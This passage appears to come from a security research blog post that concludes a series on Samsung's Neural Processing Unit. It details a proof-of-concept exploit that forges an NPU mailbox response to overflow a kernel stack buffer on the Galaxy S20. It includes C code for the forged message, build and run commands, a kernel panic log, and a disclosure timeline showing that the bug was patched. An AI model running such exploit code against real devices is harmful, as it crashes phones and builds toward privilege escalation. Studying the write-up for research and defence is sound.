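The gap between what the driver checks and what it would need to check can be modelled in a few lines. This is a sketch and not the fix shipped by Samsung: `original_check` mirrors the condition shown in mbx_ipc_get_cmd, while `stricter_check` and its `cmd_capacity` parameter are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Condition used by mbx_ipc_get_cmd: enough readable bytes for the message */
static bool original_check(uint32_t readable_size, uint32_t msg_length)
{
    return readable_size >= msg_length;
}

/*
 * Hypothetical hardened variant: the message must also fit in the
 * destination buffer, whose capacity is passed by the caller.
 */
static bool stricter_check(uint32_t readable_size, uint32_t msg_length,
                           uint32_t cmd_capacity)
{
    return msg_length <= cmd_capacity && readable_size >= msg_length;
}
```

With the values from the example above, `original_check(0x1100, 0x1000)` accepts the message, whereas `stricter_check(0x1100, 0x1000, 0x10)` rejects it because 0x1000 bytes cannot fit in a 0x10-byte destination.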


The exploit for this vulnerability is built upon the previous one, with the only addition being a different payload available here. With full control over the NPU, the idea is to write a payload that will modify the mailbox header and forge an outgoing response to the kernel.

The steps to exploit this vulnerability are as follows:

  • First, we need to pick an arbitrary offset into the response mailbox for our crafted message. In the exploit we took 0x60. We can then compute the corresponding address using the beginning of the mailbox region MAILBOX_START and the segment offset of the response mailbox mailbox_hdr->f2hctrl[0].sgmt_ofs.
#define MAILBOX_START 0x80000
#define CRAFTED_MESSAGE_OFFSET 0x60

struct message *message = (struct message *)
    (MAILBOX_START - mailbox_hdr->f2hctrl[0].sgmt_ofs + CRAFTED_MESSAGE_OFFSET);
  • Then, we forge the message we want the kernel to receive and specify a size of 0x100, which will overflow the capacity of the 0x10-byte cmd kernel structure where the response will be stored.
#define MESSAGE_SIZE 0x100

message->magic = MESSAGE_MAGIC;
message->mid = 0;
message->command = COMMAND_DONE;
message->length = MESSAGE_SIZE; /* Size that will overflow the command in the kernel */
message->self = 0x0;
message->data = CRAFTED_MESSAGE_OFFSET + sizeof(struct message); /* The payload is located right after the message */
  • Finally, we update the read and write pointers in the mailbox header, in order to get a difference larger than MESSAGE_SIZE.
/* Write pointer: points to the end of the crafted message + 0x100 bytes */
mailbox_hdr->f2hctrl[0].wptr = \
    CRAFTED_MESSAGE_OFFSET + sizeof(struct message) + 0x100;

/* Read pointer: points to the beginning of the crafted message */
mailbox_hdr->f2hctrl[0].rptr = CRAFTED_MESSAGE_OFFSET;
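
The three steps above can be sketched as a single function working on an ordinary host buffer instead of the real mailbox. This is only a simulation under stated assumptions: the struct layouts are inferred from the fields used in this article, the MESSAGE_MAGIC and COMMAND_DONE values are placeholders, and forge_response is a hypothetical helper that is not part of the original exploit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed layouts: plain 32-bit fields matching the members used above. */
struct message { uint32_t magic, mid, command, length, self, data; };
struct mailbox_ctrl { uint32_t sgmt_ofs, sgmt_len, wptr, rptr; };

#define CRAFTED_MESSAGE_OFFSET 0x60u
#define MESSAGE_SIZE           0x100u
#define MESSAGE_MAGIC          0xC0DECAFEu /* placeholder value (assumption) */
#define COMMAND_DONE           0x2u        /* placeholder value (assumption) */

/*
 * Forges a response inside `segment` (a stand-in for the response mailbox)
 * and returns the readable size the kernel would compute (wptr - rptr).
 */
static uint32_t forge_response(uint8_t *segment, size_t segment_len,
                               struct mailbox_ctrl *ctrl)
{
    struct message msg;
    uint32_t payload_ofs = CRAFTED_MESSAGE_OFFSET + (uint32_t)sizeof(msg);

    /* Make sure the message and its payload fit in the simulated segment. */
    assert(payload_ofs + MESSAGE_SIZE <= segment_len);

    /* Steps 1 and 2: place the crafted message at the chosen offset. */
    msg.magic   = MESSAGE_MAGIC;
    msg.mid     = 0;
    msg.command = COMMAND_DONE;
    msg.length  = MESSAGE_SIZE; /* larger than the 0x10-byte cmd */
    msg.self    = 0;
    msg.data    = payload_ofs;  /* payload sits right after the message */
    memcpy(segment + CRAFTED_MESSAGE_OFFSET, &msg, sizeof(msg));
    memset(segment + payload_ofs, 'A', MESSAGE_SIZE); /* dummy payload */

    /* Step 3: make wptr - rptr larger than MESSAGE_SIZE. */
    ctrl->wptr = payload_ofs + 0x100;
    ctrl->rptr = CRAFTED_MESSAGE_OFFSET;

    return ctrl->wptr - ctrl->rptr;
}
```

Calling forge_response on a zeroed buffer of a few hundred bytes yields a readable size of sizeof(struct message) + 0x100, which satisfies the kernel-side check for a message length of MESSAGE_SIZE.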

At this point, our message is ready to be processed by the kernel. Once the NPU has executed our payload, it returns gracefully to the command handling function and, along the way, sends an interrupt to the kernel to signal that a response is available. The kernel parses the message, memcpy copies MESSAGE_SIZE bytes of payload into cmd, overflowing it, and the stack corruption is detected when nw_rslt_manager returns.

If you have an unpatched Samsung Galaxy S20 and want to test this exploit, first compile it using the Android NDK and the provided Makefile.

$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
    -fpie -ffreestanding -ffunction-sections  -fomit-frame-pointer -o \
    payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
    -O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -o parser_init parser_init.c

You can then push it to the device and run it.

$ make push
// [...]

$ make run
// [...]
adb wait-for-device shell \
        su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload

The phone should reboot and the following message should be found in /proc/last_kmsg.

$ adb shell su root sh -c "cat /proc/last_kmsg" | grep -A20 "Kernel panic"
<0>[ 7717.705033]  [2:  npu-proto_AST:23209] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: nw_rslt_manager+0x2e0/0x2e4
<0>[ 7717.705053]  [2:  npu-proto_AST:23209] [Exynos][WDT][ EMERG]: watchdog reset is started to 30secs
<6>[ 7717.705075]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: TEMP: disable wdt keepalive
<6>[ 7717.705096]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: Watchdog cluster 0 stop done, WTCON = 115c18
<6>[ 7717.705120]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: s3c2410wdt_multistage_wdt_start: count=0x0000b32b, wtcon=00115c3c
<6>[ 7717.705135]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: Watchdog cluster 0 start, WTCON = 115c39
<4>[ 7717.705147]  [2:  npu-proto_AST:23209] secdbg_wdd_set_start: wdd_info->init_done: true
<6>[ 7717.705162]  [2:  npu-proto_AST:23209] debug-snapshot: item - log_kevents is disabled
<3>[ 7717.705187]  [2:  npu-proto_AST:23209] mif: s5100_send_panic_noti_ext: Send CMD_KERNEL_PANIC message to CP
<3>[ 7717.705202]  [2:  npu-proto_AST:23209] mif: pcie_send_ap2cp_irq: Reserve doorbell interrupt: PCI not powered on
<6>[ 7717.705244]  [2:  npu-proto_AST:23209] mif: mif_gpio_set_value: SET GPIO AP2CP_WAKE_UP = 1 (wait 0ms, dup 0)
<4>[ 7717.707221]  [2:  npu-proto_AST:23209] CPU: 2 PID: 23209 Comm: npu-proto_AST FTT: 0 0 Tainted: G S      W         4.19.87 #1
<4>[ 7717.707235]  [2:  npu-proto_AST:23209] Hardware name: Samsung X1SLTE EUR OPEN 21 based on EXYNOS990 (DT)
<4>[ 7717.707246]  [2:  npu-proto_AST:23209] Call trace:
<4>[ 7717.707263]  [2:  npu-proto_AST:23209]  dump_backtrace+0x0/0x1b0
<4>[ 7717.707281]  [2:  npu-proto_AST:23209]  show_stack+0x14/0x20
<4>[ 7717.707296]  [2:  npu-proto_AST:23209]  dump_stack+0xd4/0x110
<4>[ 7717.707311]  [2:  npu-proto_AST:23209]  panic+0x174/0x2dc
<4>[ 7717.707328]  [2:  npu-proto_AST:23209]  __stack_chk_fail+0x18/0x1c
<4>[ 7717.707343]  [2:  npu-proto_AST:23209]  nw_rslt_manager+0x2e0/0x2e4
<2>[ 7717.707365]  [2:  npu-proto_AST:23209] SMP: stopping secondary CPUs : SYSTEM_RUNNING


This short article concludes this series about Samsung's Neural Processing Unit implementation. This journey started from an opaque binary embedded inside Samsung's firmware images and ended with an in-depth understanding of this component, as well as primitives that could be used in a privilege escalation exploit (although we're still pretty far from an actual LPE).

It's very likely that there are multiple bugs still lurking in the codebase of the NPU, especially in functions handling machine learning computations since they are pretty complex and handle a lot of user inputs. The lack of security mitigations also makes any exploitation trivial. Thankfully, the kernel does implement mitigations and has limited interactions with the NPU, which greatly reduces the chances of a successful kernel compromise from the NPU.



  • Jan. 30, 2021 - Initial report sent to Samsung.
  • Feb. 01, 2021 - A Security Analyst is assigned to the issue.
  • Mar. 03, 2021 - Vulnerability is confirmed.
  • May 07, 2021 - Notification that a security update patching the vulnerability has been released and the issue can now be closed.


  • Mar. 15, 2021 - Initial report sent to Samsung.
  • Mar. 16, 2021 - A Security Analyst is assigned to the issue.
  • Mar. 18, 2021 - Samsung asks for clarifications regarding the permissions needed to reach the bug.
  • Apr. 05, 2021 - Details on the permissions required sent to Samsung.
  • Apr. 14, 2021 - Vulnerability is confirmed.
  • Jul. 19, 2021 - Notification that a security update patching the vulnerability has been released and the issue can now be closed.